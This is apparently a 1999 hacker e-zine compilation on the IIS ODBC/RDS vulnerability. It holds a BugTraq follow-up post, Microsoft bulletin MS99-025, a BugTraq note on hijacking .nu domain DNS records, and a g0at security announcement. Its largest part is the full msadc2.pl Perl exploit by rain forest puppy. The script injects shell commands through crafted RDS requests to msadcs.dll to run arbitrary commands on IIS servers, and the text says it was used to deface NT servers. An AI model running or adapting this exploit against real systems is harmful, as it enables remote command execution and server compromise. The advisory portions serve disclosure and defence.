if(connect(S,pack "SnA4x8",2,80,$target)){
print "Connected. Getting data";
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) {
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
##############################################################################
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}}
##############################################################################
sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
return 0;}
##############################################################################
EoF
-=-
Followup/update to IIS/RDS advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To: BugTraq
Subject Update to ODBC/RDS vulnerabilities
Date: Tue Sep 21 1999 12:07:54
Hello all,
It's been a while since I've posted anything, and I promise it will be
short this time. ;)
Microsoft has released a patched Jet ODBC engine that will fix the ODBC
problem as well as Mr. Cuartango's Excel vulnerabilities as well.
Basically, this is a 3.51 engine retrofitted with a 'sandbox' restriction
controlled by the following registry key:
\\HKLM\Software\Microsoft\Jet\3.5\Engines\SandboxMode
Also, as for the RDS problem, they recommended implementing custom
handlers to limit invocation of the RDS component to legit uses. Custom
handler support is controlled by the following registry key:
\\HKLM\Software\Microsoft\DataFactory\HandlerInfo\handlerRequired
Now, perhaps it's just me, but on three different NT boxes I have, which
are various SP3 and 5 combos on NT4, patches installed as administrator,
the permissions on these registry keys are Everyone -> Special Access,
which includes Set Value. This basically means domain users can remotely
disable handler and sandbox restrictions by changing the values of these
keys. Hmmm. I've tested this, and it worked as expected.
Also, Mnemonix pointed out an interesting aspect which I overlooked for
the RDS vulnerability that really makes it more evil. The current
limitation to the RDS exploit is that it requires a local file to 'attach'
to, specifically a .mdb. Well, you can use UNC addresses for this file,
so if you setup a Windows share on the internet, you can request your file
off that, therefore bypassing the need for a local file. I've tested
this, and it works as well.
I am finishing updates to my RDS exploit program, which I'll probably
release in the next week. It will implement all of this, plus clean up
the code a bit.
Also, I wanted to point out an ommision of credit in the RDS advisory.
Matthew Astley, who I co-wrote the May 25th advisory with the original
ODBC info, should have been given credit as well for the ODBC/Jet pipe
problem. Apologies to Matthew.
.rain.forest.puppy.
--------------------------------------------------------------------------
If I had a signoff banner, it would be here. But I don't, so I'll fake it
--------------------------------------------------------------------------
EoF
-=-
MS99-025: Microsoft advisory for RDS/IIS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-025)
--------------------------------------
Re-Release: Unauthorized Access to IIS Servers through ODBC Data Access
with
RDS
Originally Released as MS98-004: July 17, 1998
Re-Released as MS99-025: July 19, 1999
Revised: July 23, 1999
Summary
=======
Microsoft has identified a vulnerability in Microsoft(r) Data Access
Components (MDAC) that could allow a web site visitor to take unauthorized
actions on a web site hosted using Internet Information Server. The
vulnerability can be eliminated by reconfiguring or removing the affected
components of MDAC.
This vulnerability originally was reported in Microsoft Security Bulletin
MS98-004, issued July 17, 1998. It was re-released on July 19, 1999, to
remind customers of the need to address the vulnerability. It was updated
on
July 23, 1999, to discuss the need to remove sample files that are
affected
by the vulnerability, and to clarify that MDAC 2.0 is affected even if
deployed as a clean installation.
Frequently asked questions regarding this vulnerability can be found at
http://www.microsoft.com/security/bulletins/MS99-025faq.asp. The FAQ
contains instructions for eliminating the vulnerability.
Issue
=====
The RDS DataFactory object, a component of Microsoft Data Access
Components
(MDAC), exposes unsafe methods. When installed on a system running
Internet
Information Server 3.0 or 4.0, the DataFactory object may permit an
otherwise unauthorized web user to perform privileged actions, including:
- Allowing unauthorized users to execute shell commands on the
IIS system as a privileged user.
- On a multi-homed Internet-connected IIS system, using MDAC to
tunnel SQL and other ODBC data requests through the public
connection to a private back-end network.
- Allowing unauthorized accessing to secured, non-published
files on the IIS system.
Affected Software Versions
==========================
The vulnerability affects the Microsoft Data Access Components, when
installed on a web server running Internet Information Server 3.0 or 4.0.
Specifically:
- MDAC 1.5 and 2.0 are affected
- MDAC 2.1 is affected if installed as an upgrade from a
previous version of MDAC, rather than a clean installation
- Any version of MDAC is affected if Sample Pages for RDS are
installed.
NOTE: Sample Pages for RDS are provided as part of the Windows 4.0 Option
Pack and the MDAC 2.0 Software Development Kit. They are not installed by
default in the Option Pack, but are installed by default in the MDAC 2.0
SDK.
NOTE: MDAC 1.5 and IIS are installed by default installations of the
Windows
NT 4.0 Option Pack.
NOTE: IIS can be installed as part of other Microsoft products, such as
Microsoft BackOffice and Microsoft Site Server. MDAC can be installed as
part of other Microsoft products, such as Visual C and Microsoft Office.
Patch Availability
==================
This vulnerability requires a configuration change to eliminate it,
rather than a patch. Details of the specific changes needed are available
at
http://www.microsoft.com/security/bulletins/MS99-025faq.asp.
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-025: Frequently Asked Questions,
http://www.microsoft.com/security/bulletins/MS99-025faq.asp
- Microsoft Knowledge Base (KB) article Q184375,
Security Implications of RDS 1.5, IIS, and ODBC,
http://support.microsoft.com/support/kb/articles/q184/3/75.asp
- Microsoft Universal Data Access Download Page,
http://www.microsoft.com/data/download.htm
- Installing MDAC Q&A,
http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm
- Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp
- IIS Security Checklist,
http://www.microsoft.com/security/products/iis/CheckList.asp
Obtaining Support on this Issue
===============================
Microsoft Data Access Components (MDAC) is a fully supported set of
technologies. If you require technical assistance with this issue,
please contact Microsoft Technical Support. For information on
contacting Microsoft Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
===============
Microsoft acknowledges Greg Gonzalez of ITE (http://www.ite.com) for
bringing additional information regarding this vulnerability to our
attention, and .Rain.Forest.Puppy for identifying the involvement of
Sample Pages for RDS. Microsoft also acknowledges Russ Cooper of NTBugTraq
(http://www.ntbugtraq.com) for his assistance around this issue.
Revisions
=========
- July 19, 1999: Bulletin Created as re-release of MS98-004.
- July 23, 1999: Bulletin updated to discuss involvement of Sample Pages
for RDS, and to clarify status of MDAC 2.0.
------------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS
IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
msadc2.pl
~~~~~~~~~
Before the preceding this was the code being commonly used to exploit and
deface the NT servers ...
Source: PSS
url:http://packetstorm.securify.com/9911-exploits/msadc2.pl
#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
###########################################################
# config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
###########################################################
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}
if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup
if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}
if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
&known_mdb;}
if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;
##############################################################################
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
$aa="VbBusObj.VbBusObjCls.GetRecordset";
$bb="2";
} else {
$aa="AdvancedDataFactory.Query";
$bb="3";}
$msadc=<<EOT
POST /msadc/msadcs.dll/$aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
;
$msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
$dsn="$p1";}
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}
elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}
elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$dsn="$p1";}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}
##############################################################################
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
##############################################################################
sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
##############################################################################
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
##############################################################################
sub try_btcustmr {
foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";
save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
##############################################################################
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
##############################################################################
sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}
##############################################################################
sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
$args{$switch}="1";}
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
$torun="$p[3]"; $torun=~s/\n//g;
if($torun=~/btcustmr/){
$args{'c'}="1";} # this is a kludge to make it work
if($torun=~/^dbq/){ $torun=$drvst.$torun; }
if(run_query("$torun")){
print "Success!\n";} else { print "failed\n"; }
exit;}
##############################################################################
sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
##############################################################################
sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
##############################################################################
sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
foreach $drive (@drives) {
foreach $dir (@sysdirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv.$drive.":\\".$dir.$mdb)){
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
}}}}}
foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv.$drive.":".$mdb)){
if(run_query($drv.$drive.":".$mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
}}}}
}
##############################################################################
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}
##############################################################################
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}
##############################################################################
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
##############################################################################
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}
##############################################################################
sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("^Server:",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
exit;}
##############################################################################
sub use_unc {
$uncpath=$args{u};
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
if(create_table($driverline.$uncpath)){
if(run_query($driverline.$uncpath)){
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}
##############################################################################
sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}
##############################################################################
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
##############################################################################
@HWA
159.0 Hijack any .nu domain box (DoS/redirection/hijack)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source:http://packetstorm.securify.com/9902-exploits/domain.nu.DoS.txt
Recent
Submitted by: Internal
Date: Sat, 20 Feb 1999 21:20:13 -0800
From: Shane Wegner <shane@CM.NU>
To: BUGTRAQ@netspace.org
Subject: Possible DOS attack in the .nu domain service
Hello all,
I am not sure if this is known or even relevant to the list and if not,
please excuse this post.
There appears to be a bug in the niu DNS setup process which could result
in a DOS attack for those using their domains. For those unfamiliar with
niu, they provide sub-domain service under the .nu domain to machines
which do there own DNS. I have written to them on several occasions about
this issue but as of yet have received no response.
OK the bug is that any user who is willing to pay the $25 to register a
.nu domain can knock out or redirect a host under another. This is best
shown through an example.
I register mycompany.nu and in the registration form enter the hosts I
have doing the DNS for it.
Name: mycompany.nu
DNS1: machine.someserver.com
DNS2: machine2.someserver.com
After this step, my DNS entry in the .nu table looks like this
$ORIGIN nu.
mycompany IN NS machine2.someserver.com.
IN NS machine2.someserver.com.
mycompany.nu for the sake of this example had the following DNS table.
$ORIGIN nu.
mycompany IN SOA mymachine.mycompany.nu. hostmaster.mycompany.nu. (
1 301 120 604800 600 )
IN NS machine1.someserver.com.
IN NS machine2.someserver.com.
$ORIGIN mycompany.nu.
mymachine IN A 192.168.1.1
So Al's well until someone registers evil.nu with the goal of knocking out
myserver.mycompany.nu. On the form, they enter the following.
name: evil.nu
DNS1: mymachine.mycompany.nu
DNS1IP: 127.0.0.1
Now here's the bug, if you enter an IP for a machine which falls under the
.nu name-space, it maps it statically. It does not check to see if it
falls under your name-space. Therefore, our evil.nu entry in the .nu
table looks like this.
$ORIGIN nu.
evil IN NS mymachine.mycompany.nu.
$ORIGIN mycompany.nu.
mymachine IN A 127.0.0.1
So the IP for mymachine.mycompany.nu has been redirected from its
192.168.1.1 to 127.0.0.1. An attacker could conceivably redirect the mail
servers of a company to his own machine or anything to that effect.
Regards,
Shane
--
Shane Wegner: shane@cm.nu
Tel: (604) 930-0530
Sysadmin, Continuum Systems: http://www.cm.nu
Personal website: http://www.cm.nu/~shane
ICQ UIN: 120000
PGP: keyid: 2048/F5C2BD91
Fingerprint: 8C 48 B9 D8 53 BB D8 EF
76 BB DB A2 1C 0D 1D 87
@HWA
160.0 The dreaded and most pheared return of the infamous GOAT!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Submitted by Debris
From the new website:
note: this text has been modified from its' original form, it has been
formatted to fit your screen. - Ed
http://www.goat-advisory.org/
January 1998, an EFNET channel was created, #feed-the-goats. From that
emerged a webpage, http://goat.sphix.com. The purpose of that page was to
mock, satirize and piss off the 'underground community'. As we grew in
popularity, people who were NOT members began defacing websites under the
fair name of g0at. Goat security then created a hoax where it was
believed, yahoo was cracked. Goat security's popularity skyrocketted after
such incidents.
Text files, code and advisories were created daily and the archive became
rather plentiful, however, problems arose which are described in
g0at-quit.txt leading to the end of g0at. The press release states that
g0at security will never return. Well it is time to anule that. G0at
security has returned.
For many monthes people have been begging for the return of g0at security.
We have finally caved in. We are in the process of salvaging old text
files, images etc... If you have anything created by us, please visit
#feed-the-goats key: blaq, immediatly and speak with Debris.
The 'underground community' has fallen apart. The clueless run amock and
give people with direction, goals, and knowledge, a bad name to the
general public. The media has the absolute wrong impression of 'hackers'
as you most likely have heard many rant about before (I will not
bore you with IRC politics/drama). G0at security is back to start up where
we left off. Lightening up the world and spreading joy while pissing most
people off.
We are not a defacing group, a ./hacking group or anything else similar to
that. Do not bug us with question pertaining to this. We want nothing to
do with this other then mocking it.
Coming soon: Various new text files, new members, new webdesign, archive
of salvaged material.
debris@total.net
-=-
http://www.hackernews.com/defaced/1999/yahoo0399/
Original quit text:
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Due to recent events, the downfall of g0at security has become
imminent.
These incidents include:
- Legal problems of some of our members. - Recent hacking crack
downs launched by many governments. - The recent takeover of our channel,
#feed-the-goats (Efnet). - Losing our server due to a sloppy hack by one
of our members (/me looks away). - Losing our text files due to our domain
being wiped off the server. - Fights and dissapearances of some of our
members. - The maturing of our members.
g0at security hereby announces it's closure. By this we do not
mean we are going legit, we are finished. Unlike other groups we
most likely will not spawn back.
[Brief history of g0at security]
One day in Feb. I believe, ech0 and myself (Debris), decided to
irc. ech0 informed me that occasionally hung out in a channel he,
himself created called #feed-the-goats. From there, members of a
popular group, HcV along with members of Global Hell, began
coming. ech0 and myself decided that we wanted to be as elite as
our peers in #rootworm, so we made a webpage. The purpose of the
page was to mock and satirize hacker culture in general. Our first
